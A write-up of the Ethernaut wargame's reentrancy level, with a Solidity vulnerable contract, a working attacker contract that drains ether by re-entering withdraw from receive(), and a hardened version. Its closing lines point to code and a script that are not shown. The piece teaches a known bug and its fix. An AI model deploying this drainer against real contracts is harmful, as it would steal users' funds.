Ethernaut Level 10 - Reentrancy

The Ethernaut is a Web3/Solidity based wargame inspired by overthewire.org. Here is the solution to Level 10, Reentrancy.

The goal of this level is for you to steal all the funds from the contract. Things that might help:

- Untrusted contracts can execute code where you least expect it.
- Fallback methods
- Throw/revert bubbling
- Sometimes the best way to attack a contract is with another contract
- See the Help page above, section "Beyond the console"

The name of the challenge basically gives away the solution. The contract's withdraw method is a classic example of a reentrancy vulnerability: it sends ether to msg.sender before it updates that sender's balance.

The vulnerability exists because every time a contract transfers ether to another contract with a low-level call, it hands control to the recipient for a moment: the recipient's receive or fallback function runs before the sending function continues. An attacker can use that moment to call withdraw again. If the recipient's balance is not updated before the funds are actually transferred, each re-entered withdraw still sees the original balance, so withdraw is called in a loop until all the ether has been drained from the victim contract.
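As an added example (not the post's own code, and not the level's source): a target contract written in the shape of the level, an attacker contract that re-enters it from receive(), and a hardened withdraw beside it. The IReentrance interface is assumed to match the level's donate/withdraw signatures; the Vulnerable contract is a constructed illustration of the bug, and the unchecked block reproduces the silent underflow that older compilers gave for free.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Target in the shape of the level's contract (assumption: an illustration of
// the pattern, not the level's own source). Interaction before effect is the bug.
contract Vulnerable {
    mapping(address => uint256) public balances;

    function donate(address to) external payable {
        balances[to] += msg.value;
    }

    function balanceOf(address who) external view returns (uint256) {
        return balances[who];
    }

    function withdraw(uint256 amount) external {
        if (balances[msg.sender] >= amount) {
            // Control passes to msg.sender here, with balances[] still untouched.
            (bool ok, ) = msg.sender.call{value: amount}("");
            require(ok, "transfer failed");
            // Pre-0.8 compilers wrapped silently on underflow; `unchecked` keeps
            // that behaviour so the nested decrements do not revert the attack.
            unchecked { balances[msg.sender] -= amount; }
        }
    }

    receive() external payable {}
}

// Only the functions the attacker needs from the target (assumed signatures).
interface IReentrance {
    function donate(address to) external payable;
    function withdraw(uint256 amount) external;
}

contract Attacker {
    IReentrance public immutable target;
    address public immutable owner;
    uint256 private amount;

    constructor(address target_) {
        target = IReentrance(target_);
        owner = msg.sender;
    }

    // 1. Seed a balance in the target so the first withdraw passes its check.
    // 2. Start the loop; every transfer back into this contract re-enters.
    function attack() external payable {
        require(msg.sender == owner, "not owner");
        require(msg.value > 0, "send some ether");
        amount = msg.value;
        target.donate{value: msg.value}(address(this));
        target.withdraw(amount);
    }

    // Re-entry point. Withdraw again while the target still holds ether; take
    // whatever is left when that is less than `amount` so no dust remains.
    // An `if` rather than a `require` lets the final transfer complete.
    receive() external payable {
        uint256 remaining = address(target).balance;
        if (remaining > 0) {
            target.withdraw(remaining < amount ? remaining : amount);
        }
    }

    function collect() external {
        require(msg.sender == owner, "not owner");
        payable(owner).transfer(address(this).balance);
    }
}

// Hardened form: checks-effects-interactions plus a simple mutex.
contract Safe {
    mapping(address => uint256) public balances;
    bool private locked;

    modifier nonReentrant() {
        require(!locked, "reentrant call");
        locked = true;
        _;
        locked = false;
    }

    function donate(address to) external payable {
        balances[to] += msg.value;
    }

    function withdraw(uint256 amount) external nonReentrant {
        require(balances[msg.sender] >= amount, "insufficient balance"); // check
        balances[msg.sender] -= amount;                                   // effect
        (bool ok, ) = msg.sender.call{value: amount}("");                 // interaction
        require(ok, "transfer failed");
    }
}
```

Deploy Attacker with the address of the target instance, call attack() with a small value, then collect(). The call chain is attack -> withdraw -> receive -> withdraw -> receive ... until the target's balance reaches zero; only then do the nested withdraws unwind and decrement balances[], which is why the decrement must be unchecked for the exploit to succeed on a 0.8 compiler. In Safe the balance is reduced before the external call, so a re-entered withdraw fails the check, and the mutex blocks it even earlier.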

An example of an attacker contract can be found below:

After compiling the above contract, it can be deployed and called using the usual script:

That's all. The above contract will drain all the ether from the victim. After that I can submit the challenge.
